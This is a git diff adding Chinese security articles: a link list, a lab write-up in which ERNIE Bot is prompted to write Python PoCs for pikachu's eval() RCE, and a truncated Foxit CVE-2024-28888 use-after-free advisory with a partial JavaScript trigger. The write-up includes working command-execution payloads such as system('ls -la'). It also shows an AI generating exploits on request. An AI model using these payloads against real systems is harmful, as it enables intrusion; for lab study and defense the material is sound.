+[数据安全知识:数据库安全重要性](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104183&idx=2&sn=f2a98256b0497ce3a99c0ad30223bf40&chksm=8bbccfcebccb46d8aac9f8a5c8d1f46061ca61ad69b3a61d52d3dc614e1e18ae65d982a5574b&scene=21#wechat_redirect) + + +[数据安全知识:数据库安全威胁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103736&idx=2&sn=6d70e9d5690b4e3748460d641e14fce8&chksm=8bbcce01bccb47177fce9597fb30e8a27e00a9683e6afbcfb2ea7128a424504ff24af8aa54cc&scene=21#wechat_redirect) + + +[数据安全知识:不同类型的数据库](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103688&idx=1&sn=9377838e11b62f5d73aa1dbda22ec178&chksm=8bbcce31bccb4727c19ada8cdf5d571227e363447987209eb77f4f07e240b1cd263c2de8a547&scene=21#wechat_redirect) + + +[数据安全知识:数据库简史](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103686&idx=1&sn=abcfc1080a7641d41607cca4dc0fab1d&chksm=8bbcce3fbccb4729926a8249ec3bb0344a59268b7af49a68100c03839ace2c6ea59228e68c75&scene=21#wechat_redirect) + + +[数据安全知识:什么是数据出口?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103679&idx=1&sn=f23569ddbc6e5b5b39b307401a53a7f4&chksm=8bbcc9c6bccb40d06ee30f3e73257c08ff61d5aff33040f9a08513473a1f9619f285a531ef42&scene=21#wechat_redirect) + + +[数据安全知识:什么是数据治理模型?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103450&idx=1&sn=ce981cd32e6966e5bfd08e0e85ac6528&chksm=8bbcc923bccb4035b5bd145b2941e0f096cb26f0448a3c5f7fd1bf0652507f2470a33ea26fde&scene=21#wechat_redirect) + + +[](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104021&idx=1&sn=7f80bb27ce6ad7c9debe83c172ff9f73&chksm=8bbccf6cbccb467a0971b9de4a8b14851c2666ad6934a88b8324a1ffc4b5cf5109cbc3976697&scene=21#wechat_redirect) + +******>>>错与罚<<<** + +[警惕风险突出的100个高危漏洞(上)](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110660&idx=2&sn=f73b70334bbbfd41e947196421c0e48e&chksm=8bbcd57dbccb5c6b8b4e1d2fb983c38b5d8b5b4eac9fa5d962a394986b52c236ffd52e98900c&scene=21#wechat_redirect) + + +[警惕风险突出的100个高危漏洞(下)](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110692&idx=1&sn=07a2e458a81bf5e171c012ec2d390747&chksm=8bbcd55dbccb5c4bb497a3f138646541862342730a91e07cd87ee057ed895463fc79889d7f9a&scene=21#wechat_redirect) + + +[警惕“两高一弱”风险及安全防护提示(全集)](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110867&idx=2&sn=6f1237fc1d4b4a96274a7ac32d30dd48&chksm=8bbb2a2abccca33c14387b6dab727657d29828f1d345e5a5ed6916c551c79caa46227b70e98f&scene=21#wechat_redirect) + + +[不履行网络安全保护义务是违法行为!多家单位被通报!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110660&idx=3&sn=d76fcf3f3b2460f12788131b24bd07bb&chksm=8bbcd57dbccb5c6b54706e7a7b969bec42b8f938b5e3288c4f66181a6761ec2b2a2c6e762258&scene=21#wechat_redirect) + + +[因侵犯公民个人信息罪 深圳一人被判一年三个月 售卖他人求职简历](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110562&idx=2&sn=c6a1c5f1a8ca72cee2275e12c04e3da7&chksm=8bbcd4dbbccb5dcde3df4fcf8c145d2ea32ed8cc9661e41cfc3e81b30c2b4bc9044290932a2f&scene=21#wechat_redirect) + + +[公安部网安局:河南开展整治网络谣言专项行动 查处造谣传谣3000余人](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110555&idx=1&sn=5ed0b638c02610d74ea55c6ea395fa6d&chksm=8bbcd4e2bccb5df45946baa11ef66ff7fa78857a8860732bc1648d3f724cd94b1b375db31455&scene=21#wechat_redirect) + + +[四川遂宁公安公布10起涉网违法犯罪典型案例](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110543&idx=1&sn=82fb911e67140dc4c3bc2f718b51b2f2&chksm=8bbcd4f6bccb5de02ac699120a6846b52769fc3b556d5c714989155da6b0112602f945efdca9&scene=21#wechat_redirect) + + +[276人落网!河南新乡警方摧毁特大“网络水军”犯罪团伙](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107934&idx=1&sn=3fdd7afb3d6a3f78a89264fee3d0b20f&chksm=8bbcdea7bccb57b19ec50b56f4d52ea88256f018bdaf52e71b0bb69c04b43b657068fc8873d3&scene=21#wechat_redirect) + + +[重拳出击严打涉网犯罪 海淀警方守护网络清朗](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108593&idx=1&sn=8e93b447968d40bf565560c46745345c&chksm=8bbcdd08bccb541e2f8b10b6b48906b74b32ac105ed15d32e2b09bd9a817a62669089a4b6eee&scene=21#wechat_redirect) + + +[网警@同学们 暑期这些兼职不能做!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108584&idx=1&sn=27619dc24ce7fb3ea7d6c3f6583c8985&chksm=8bbcdd11bccb5407929b19d23b46d46660f67a3aa3403573c4f719b853bf5cac1bea3d874a76&scene=21#wechat_redirect) + + +[非法出售公民个人信息 网站经营者被判三年有期徒刑](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108478&idx=1&sn=7141f5a94125cd7197f42ad9ec90d049&chksm=8bbcdc87bccb5591b67768e99a087cf7ed7dcf649de05aae58f07145ad1f1ebb10b19811fa4a&scene=21#wechat_redirect) + + +[超范围采集公民信息,违法!鹤壁网警出手](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108457&idx=1&sn=63410ada1542c292aef408d9f19a406e&chksm=8bbcdc90bccb558613ccf77045115cadee03018421cc7d27e0c4d3539fc0e417f0bf127b0ffb&scene=21#wechat_redirect) + + +[一公司高管为泄愤攻击智慧停车收费系统,致上千家停车场无法自动抬杆](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108431&idx=1&sn=e956b5e0330d1ac42c0970a8221cbd2d&chksm=8bbcdcb6bccb55a02ad83b6f9d4e0982a66aa2c68f190784d4872d96ca575491f8b6cbb395c2&scene=21#wechat_redirect) + + +[重庆某国企因网安责任人履职不到位被约谈](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108391&idx=2&sn=3b7ecd3285d400cb121a1c2b4a315f77&chksm=8bbcdc5ebccb554840f9a3a4c1cf6aaa0232f99264fc985c73680c3eba4ac9620c172430c96d&scene=21#wechat_redirect) + + +[因违规收集使用个人信息等,人保寿险宁波分公司被罚32万,4名责任人同时被罚](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108384&idx=1&sn=b4d530f625ded16386039925ec895b93&chksm=8bbcdc59bccb554fb14966a1dbb45cadd2bea2262ef55d24fd8b3e9e5823d62f85cf9a665ebd&scene=21#wechat_redirect) + + +[回顾长沙市三个区网信开出首张罚单的不同时间和处罚单位类型](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108218&idx=1&sn=bb9a9d86f84190165657fe632a20a6fd&chksm=8bbcdf83bccb56957221b54507e3e3d2c5175c3c03e446c1b6f21ea0f5996d63e9823c40bea1&scene=21#wechat_redirect) + + +[上海4人被判刑:5元掌握明星偶像行程?贩卖明星信息4人被判刑!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107594&idx=1&sn=ee06d83cfaa8707d854bc55f40390712&chksm=8bbcd973bccb50656351a887d05ff7fe1903fe9b047c326c234ecb35b30ca16fe9bc9de18fb3&scene=21#wechat_redirect) + + +[假期内,网络主播直播约架?郑州警方迅速控制,刑拘十人!网络空间不是法外之地!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107500&idx=1&sn=e7164b1ec2e7b3c81ef786c8062ea90d&chksm=8bbcd8d5bccb51c37b36fb9dae5edc4cb7eb7f37c0676aed9e03349369fe14db5b5414603066&scene=21#wechat_redirect) + +**** + +[网安局:拒不履行网络安全保护义务,处罚!事关备案!](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107522&idx=1&sn=4843f7b72a7a7b1da458c4f240947dc2&chksm=8bbcd93bbccb502d8bc6a2291e7c5a08798ae79d5cae3037de990332dfe0f9243add5e39e32b&scene=21#wechat_redirect) + + +[网络水军团灭记:“转评赞”狂刷单 上百人“网络水军”团伙落网](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107516&idx=1&sn=117d1be3f2c7b4057e6a60d0ab48f29d&chksm=8bbcd8c5bccb51d3aad4a7cf41cbd73e2c6fb01a152de00603cfbeb5ce7aa31ca62c95653cbc&scene=21#wechat_redirect) + + +[北京多家公司因不履行网络安全保护义务被处罚!“两高一弱”仍然是安全隐患重点](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104010&idx=1&sn=0ddfdc41a52d235c99269b784b7858fa&chksm=8bbccf73bccb4665d0c29f8067b90e0e9b48894d2d4bbb9da98e64218efa47e36c32034a4775&scene=21#wechat_redirect) + + +[关于“近20台服务器“沦陷”,3.54亿条个人信息被盗”一点点浅析](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107485&idx=1&sn=b921658e6fc54b0e03c424060bb195c2&chksm=8bbcd8e4bccb51f23d9e791898e7242435c9eb86a9466eb14696154f453e909df4ca99058048&scene=21#wechat_redirect) + + +**>>>其他<<<** + +[2023年10佳免费网络威胁情报来源和工具](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103402&idx=1&sn=80a1ee98453d96a6f2304272d2a6b33e&chksm=8bbcc8d3bccb41c5fe204b9933fbded47cd14612e3101111b2f806d8a136a61ff27577dfd765&scene=21#wechat_redirect) + + +[重大网络安全事件事后工作很重要](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109243&idx=1&sn=66ebd9e0cd7aaed3967e7892e97411ec&chksm=8bbcd382bccb5a94ea5827868c3b4f53720df5924228b6d7e86bdb3846af2005a791c988dc57&scene=21#wechat_redirect) + + +[默认安全:对现代企业意味着什么](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109171&idx=2&sn=ccd124eea257169076752301ad771bfc&chksm=8bbcd34abccb5a5c65ecc8e34939a28c986df836538b42a371a98ab4bb86ffaf6745a614cd30&scene=21#wechat_redirect) + + +[网络安全知识:什么是事件响应?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109115&idx=1&sn=af5883cf9e70ccedd3b149ec88083f63&chksm=8bbcd302bccb5a14c517e489c94f479fe506653555319e7afb7ac497f1b18f931fc112acca05&scene=21#wechat_redirect) + + +[网络安全知识:什么是攻击面?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109689&idx=1&sn=61962a0441d69a6a45bafa0858c73ac3&chksm=8bbcd140bccb5856dcc218be44459f8ec2bb83155b9245135aa2e0660d04f26bf64a2032334d&scene=21#wechat_redirect) + + +[网络安全知识:什么是访问控制列表 (ACL)?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109981&idx=1&sn=3b95eb9a12e7cd3a9db4a8fb90c3f298&chksm=8bbcd6a4bccb5fb2d18a5315364285c9368181762a07181abbdc87be85e92274d405c6b8148a&scene=21#wechat_redirect) + + +[网络安全知识:什么是访问管理?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110001&idx=1&sn=e18dd441809b6634de4821a0d619e898&chksm=8bbcd688bccb5f9ea001b8fb253e92f929ec2b1441f7a9d86e1bb8a6a0cbf3010d97c4d41116&scene=21#wechat_redirect) + + +网络安全知识:什么是访问矩阵? + +网络安全知识:什么是账户收集? + +网络安全知识:什么是工业控制系统 (ICS) 网络安全? + +网络安全知识:什么是暴力攻击? + +网络安全知识:什么是安全审计? + +网络安全知识:什么是分组密码? + +[网络安全知识:什么是僵尸网络?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110814&idx=1&sn=8b8643f27090517cd38b7bdfca106b64&chksm=8bbcd5e7bccb5cf1de02c7a139dcf27e3772926c33a2c799f50f34bc283334265f6d1a55d314&scene=21#wechat_redirect) + + +[网络安全知识:什么是非对称加密?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110867&idx=1&sn=20f07912999089d4b0133c7a1e5cec82&chksm=8bbb2a2abccca33ce3f700baf9cd4c96168180228810626a777017d55479809aad038e0e2f55&scene=21#wechat_redirect) + + +[网络安全知识:什么是边界网关协议 (BGP)?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110952&idx=1&sn=ac6937a832634777a5c0480e7b847e5c&chksm=8bbb2a51bccca347a51a6e3ae6b002b162026c6d3cceb89be97ffc4d7abf9cb1175be02c72ab&scene=21#wechat_redirect) + + +[网络安全知识:什么是缓冲区溢出?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110978&idx=2&sn=864c593d89fd0c500cabf040fc6d254e&chksm=8bbb2abbbccca3adcb1bf265e874de8fe2f622998c81a423e744d94ba5fc5efc46d4299707a2&scene=21#wechat_redirect) + + +[网络安全知识:网络安全中的EDR是什么?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111008&idx=2&sn=e68f898907e90b7d12e4d6c89dd053f2&chksm=8bbb2a99bccca38f6ebc8b3e3df8ee219a839137a47c4d9321357aa7924c539eff63a681a932&scene=21#wechat_redirect) + + +[网络安全知识:什么是身份验证?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111116&idx=1&sn=f18dfbd3df26e039176ca2a89538cc99&chksm=8bbb2b35bccca223a87356ec689522b735b67f210d0909afc7ad0947123e7a28fa81c292b517&scene=21#wechat_redirect) + + +[网络安全知识:什么是勒索软件?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111162&idx=1&sn=2bb5e90d61e923c6f8bda9daaf2f4e22&chksm=8bbb2b03bccca2157560e7f883da20ec97ea1f28f4acac53d2e1f3cb70fca6a6bb635c5f9b28&scene=21#wechat_redirect) + + +[网络安全知识:什么是授权?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111403&idx=1&sn=dfc2ab6b8f3b16c1b396f4e9ecd46d32&chksm=8bbb2812bccca104d3a5e98cfda7df39998f99aa684e8e1d19f0ff3b1ccbd2c5fefa1f631d0f&scene=21#wechat_redirect) + + +[网络安全知识:什么是自治系统?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111408&idx=1&sn=64fd103eabd6f3385cbd7d1f5753e1ba&chksm=8bbb2809bccca11f0912cdabfc8cdbaa9e088e3fff648bdc784020ebc60fb113f4a3854ce528&scene=21#wechat_redirect) + + +[网络安全知识:什么是蓝队?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111435&idx=1&sn=76a6e146976c771efbd33d18711aeaed&chksm=8bbb2872bccca16471c5a11ef0ed85b961ea13f79840e6480868f5a2e07bd92f0b5b730c9858&scene=21#wechat_redirect) + + +[网络安全知识:什么是Bind Shell?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111434&idx=1&sn=6abb4da55ace854504634b91c5d03d0d&chksm=8bbb2873bccca1658009cced3c8eb6e33d8fe70b92b21c909d19e165f34984370ce685464795&scene=21#wechat_redirect) + + +[网络安全知识:什么是安全网关?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111461&idx=1&sn=49f35ce8e8c4a514021230d6ff71df63&chksm=8bbb285cbccca14a366dfa79b28eade1946697ad6e21d56c4779326d5c64bf3b19e8da17c334&scene=21#wechat_redirect) + + +[网络安全知识:什么是蓝队?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111467&idx=1&sn=535dc711614409556111ae5f8b934fb1&chksm=8bbb2852bccca144b52292ba3a6db4c0d1bc30e994e44436b32646ad30155e32b093bc8896a4&scene=21#wechat_redirect) + + +[网络安全知识:什么是防病毒产品?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111499&idx=1&sn=af21f8e561e6dcb9054731c9f6eeeb44&chksm=8bbb28b2bccca1a48d49ba0274f13bce414011c0d5c5b0343e4fcd44a6b8084c360497b3196f&scene=21#wechat_redirect) + + +[网络安全知识:什么是横幅抓取?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111530&idx=1&sn=b96c0cb4c526efa421140f1969054370&chksm=8bbb2893bccca185b9d74221dda8928675234c7dca7a7509ada71f75d12725c09f24556f8ce5&scene=21#wechat_redirect) + + +[网络安全知识:什么是堡垒主机?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111569&idx=1&sn=682b9fd72de2345add63f32cb03a9594&chksm=8bbb28e8bccca1fed6e96e303693f15d2fca5af53104c4501266138326ea8dcd814d567dc383&scene=21#wechat_redirect) + + +[网络安全知识:什么是引导扇区病毒?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111623&idx=1&sn=d08c3a5d6a56d19ab09efc23f931f591&chksm=8bbb293ebccca0281f91f4b4841fd0322ccf054b00884bf4d5e781ad7b87af2e748663447bb3&scene=21#wechat_redirect) + + +[网络安全知识:计算机网络中的桥接器](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111663&idx=1&sn=988871cc851be902d4a522742f3aa74f&chksm=8bbb2916bccca00079ad347eb1edb3b05e89f992029a0578d2bee3f35d7f57ded335938a998d&scene=21#wechat_redirect) + + +[网络安全知识:什么是广播?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111804&idx=1&sn=bfebf50ec42eb80bb514fcd58b4118f7&chksm=8bbb2985bccca093779606eda8be3e7d8612cff4875b2d53b1bba8c7b824b8026cdc1a94c3b3&scene=21#wechat_redirect) + + +[网络安全知识:什么是业务连续性计划?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111861&idx=1&sn=6422e5fff3d9f15538ad1f584c9d64a7&chksm=8bbb29ccbccca0daf5a36e2b9ecfaadbcce7536e764d12c94cb11f603b3dd08d024fe0a31ee4&scene=21#wechat_redirect) + + +[网络安全知识:什么是基于证书的身份验证?](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111903&idx=1&sn=4fff383f27b653414bf334d894aff2f2&chksm=8bbb2e26bccca730f90859d9ce0095bf42192f937c3f8614cb703804cc21560ecb39aeb19315&scene=21#wechat_redirect) + + +[将人类从网络安全中解放出来](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110078&idx=1&sn=9b6012acb2808e9979623b819070c6e3&chksm=8bbcd6c7bccb5fd1b188fdbcaffeab331d050f1f48a14a5a3d150c1d2933c7f644b0716b4cda&scene=21#wechat_redirect) + + +[人,是造成网络安全问题的根本原因](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110057&idx=2&sn=59ec8be4eb16065bba92c423f443e75b&chksm=8bbcd6d0bccb5fc6b550d4baa70646f94e2b2bb5f3d8639a4f8ecca6fdf314c85e32c635f23c&scene=21#wechat_redirect) + + diff --git a/doc/AI代码审计和POC编写.md b/doc/AI代码审计和POC编写.md new file mode 100644 index 00000000..51e1537a --- /dev/null +++ b/doc/AI代码审计和POC编写.md @@ -0,0 +1,226 @@ +# AI代码审计和POC编写 +原创 道玄安全 道玄网安驿站 2024-11-16 15:25 + +**“** + AI做代码审计和POC编写真好使**”** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yPA9bic9zzTydWv4XTTHH2NAiamMp8Kxsh4s2lukPuyuwnia3NiaHkiaU8a3JGFhLvNnYvtLvHTFAd91Rw/640?wx_fmt=png&from=appmsg "") + +     +看到了,**关注一下** +不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:**标松君** +,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:**重生者安全,** + 里面每天会不定期更新**OSCP** +知识点,**车联网** +,**渗透红队** +以及**漏洞挖掘工具** +等信息分享,欢迎加入;以及想挖**SRC逻辑漏洞** +的朋友,可以私聊。 + + + + + +01 + +— + + + +AI代码审计初体验 + + +        在看了很多AI模型对代码审计的能力后,小编也想来体验一下AI做代码审计和POC编写的尝试,所以有了一下小实验: + +1.实验目标:通过**AI**写出一段**python**编写的**POC** + +2.实验工具:**百度文心一言** + +3.实验靶机:pikachu + + + +02 + +— +## 实验过程 + + + +    小编选择了pikachu的RCE漏洞,漏洞代码如下: +``` +路径:C:\phpstudy_pro\WWW\pikachu\vul\rce\rce_eval.php + +if(isset($_POST['submit']) && $_POST['txt'] != null){ + if(@!eval($_POST['txt'])){ + $html.="

你喜欢的字符还挺奇怪的!

"; + + } + +} +``` + + +将代码输入文心一言并附上要求: + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqWKCg6ibKzIicOtPwSdYnpLI3oby2UiaxyzBmFNIcnrc2RanMwbKSxxY5A/640?wx_fmt=png&from=appmsg "") + + +下面是AI给出的html版的代码: +``` + + + + POC: Exploit for eval() vulnerability + + +

POC: Exploit for eval() vulnerability

+
+ +

+ + +
+ + +``` + + +小编想要的是python版本的,就继续要求它: + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaq8Qsludib0jKe5KibI86oRUTe3oHTJ4EjsrBAd8mcu8E2zv6QAK37Lfqw/640?wx_fmt=png&from=appmsg "") + + +代码如下: +``` +import requests + +# 目标网站的 URL +url = "http://your-vulnerable-site.com/vulnerable-page.php" + +# 要执行的 PHP 代码(作为字符串发送) +malicious_code = "" + +# 构建 POST 数据 +post_data = { + 'txt': malicious_code, + 'submit': '1' # 假设后端检查这个字段来确定是否处理请求 +} + +# 发送 POST 请求 +response = requests.post(url, data=post_data) + +# 输出响应内容 +print(response.text) +``` + + +将代码中的URL地址修改一下,试一试,发现不太行,直接用它的payload放进漏洞的输入框发现是失败的: + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaq1YG1T5jLMRjhQ5m3erm3VOmpzjlcQPjfM06yth5YwIVlcmGQQljL5A/640?wx_fmt=png&from=appmsg "") + + +我们继续要求: + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqVNwJjLJkeJRApfUxIYMetVtFSFneUMOlKLb1WTnnmvbecfCtwKUODQ/640?wx_fmt=png&from=appmsg "") + + +这回它给出的poc是: +``` +import requests + +# 目标URL(替换为你的目标URL) +target_url = "http://example.com/vulnerable_script.php" + +# 构造POST数据 +# 尝试执行一个简单的echo语句 +post_data = { + 'submit': '1', # 确保submit字段存在 + 'txt': 'echo "Hello from eval!";' # 尝试输出字符串 +} + +# 发送POST请求 +response = requests.post(target_url, data=post_data) + +# 打印响应内容 +print(response.text) +``` + +直接把payload放到输入框, +可以正常执行了! + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqnDYIFfCGhY9u4aib4MLeElbdHqaBv493yO6J2kUDLMibzXxKKXjsGlWA/640?wx_fmt=png&from=appmsg "") + + +继续给它要求: +``` +就照着'txt': 'echo "Hello from eval!";' 的格式,写一个system函数的poc +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqYTu7TOeo5TmiaAJllPsqkUKReJoniaUdVdGdcE1e5IA43zlAIeZyY62Q/640?wx_fmt=png&from=appmsg "") + + +POC如下: +``` +import requests + +# 目标URL(替换为你的目标URL) +target_url = "http://example.com/vulnerable_script.php" + +# 注意:在Windows系统上,应使用'dir'而不是'ls' +# 构造POST数据,尝试执行system函数列出当前目录内容 +# 对于Unix/Linux系统 +post_data_unix = { + 'submit': '1', # 确保submit字段存在 + 'txt': 'system("ls -la");' # 尝试执行ls命令列出目录内容 +} + +# 对于Windows系统 +# post_data_windows = { +# 'submit': '1', +# 'txt': 'system("dir");' # 尝试执行dir命令列出目录内容 +# } + +# 选择适当的POST数据(根据你的目标系统) +post_data = post_data_unix # 或者 post_data_windows + +# 发送POST请求 +response = requests.post(target_url, data=post_data) + +# 打印响应内容 +print(response.text) +``` + + +由于我的是windows部署的靶机,所以出现了下面的结果: + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yM8MVMVR9fYxCBbOBo9PCaqLfvylgiciaTb39lFPuDwTuxtSVmEoJSbousyx9tdKdMQFsohOicvd05Ug/640?wx_fmt=png&from=appmsg "") + + + +到现在我已经成功的让AI根据一段代码写出了poc!,不得不说AI做代码审计是天然的优势! + + + + + +**更多精彩内容请扫码关注“重生者安全”星球** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/L369x9IF3yPA9bic9zzTydWv4XTTHH2NAeuqcZvqTz0LHiadOuGVcHz49J7Wl5mAkug4yC75PbuErvyuib90R9l8g/640?wx_fmt=png&from=appmsg "") + +**** +免责声明: +### 本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 + +第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助 + +第十二条:  国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。 + +任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。 + +第十三条:  国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。 + + + + + diff --git a/doc/CVE-2024-28888:福昕阅读器中使用释放后导致远程代码执行.md b/doc/CVE-2024-28888:福昕阅读器中使用释放后导致远程代码执行.md new file mode 100644 index 00000000..abcdfa3f --- /dev/null +++ b/doc/CVE-2024-28888:福昕阅读器中使用释放后导致远程代码执行.md @@ -0,0 +1,196 @@ +# CVE-2024-28888:福昕阅读器中使用释放后导致远程代码执行 + Ots安全 2024-11-16 07:02 + +![](https://mmbiz.qpic.cn/mmbiz_gif/bL2iaicTYdZn7gtxSFZlfuCW6AdQib8Q1onbR0U2h9icP1eRO6wH0AcyJmqZ7USD0uOYncCYIH7ZEE8IicAOPxyb9IA/640?wx_fmt=gif "") + +**网址** +- https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-1967 + +**目标** +- 福昕PDF编辑器版本:2024.X(含)~2024.2.3.25184(含)(Windows) + +- 福昕PDF编辑器版本:2023.X(含)~2023.3.0.23028(含)(Windows) + +- 福昕PDF阅读器版本:~2024.2.3.25184(包含)(Windows) + +- 福昕PDF编辑器版本:2024.X(含)~2024.2.3.64402(含)(macOS) + +- 福昕 PDF 编辑器版本:2023.x(含)~ 2023.3.0.63083(含)(macOS) + +- 福昕 PDF 阅读器版本:~ 2024.2.2.64388(包含)(macOS) + +- 福昕 PDF 编辑器版本:13.x(包含)~ 13.1.2.62201(包含)(macOS) + +- 福昕 PDF 编辑器版本:12.x(包含)~ 12.1.5.55449(包含)(macOS) + +- Foxit PDF Editor版本:~11.1.9.0524(包含)(macOS) + +- 福昕 PDF 编辑器版本:13.X(包含)~ 13.1.3.22478(包含)(Windows) + +- 福昕 PDF 编辑器版本:12.X(包含)~ 12.1.7.15526(包含)(Windows) + +- Foxit PDF Editor版本:~11.2.10.53951(包含)(Windows) + +**解释** + +Foxit PDF Reader使用V8 JavaScript引擎支持交互式PDF功能。交互式 PDF 是包含可点击链接、按钮、表单字段、音频、视频和其他元素的 PDF 文件。 + +Foxit PDF Reader在管理复选框对象时存在释放后使用漏洞。在下面的PoC代码中,delete_pages()回调函数在addField()执行第二个函数时被触发。deletePages()当复选框对象被释放然后在未经验证的情况下重新使用时,就会出现释放后使用漏洞。 + +``` +function main() { + + var aa = app.activeDocs[0].addField("ADD", "checkbox", 2, [17,0,5,14] ).defaultIsChecked(0); + + getField("txt3").setAction("Calculate",'delete_pages();'); + + app.activeDocs[0].addField("ADD", "checkbox", 0, [17,0,5,14] ) ; +  + // 이후 checkbox 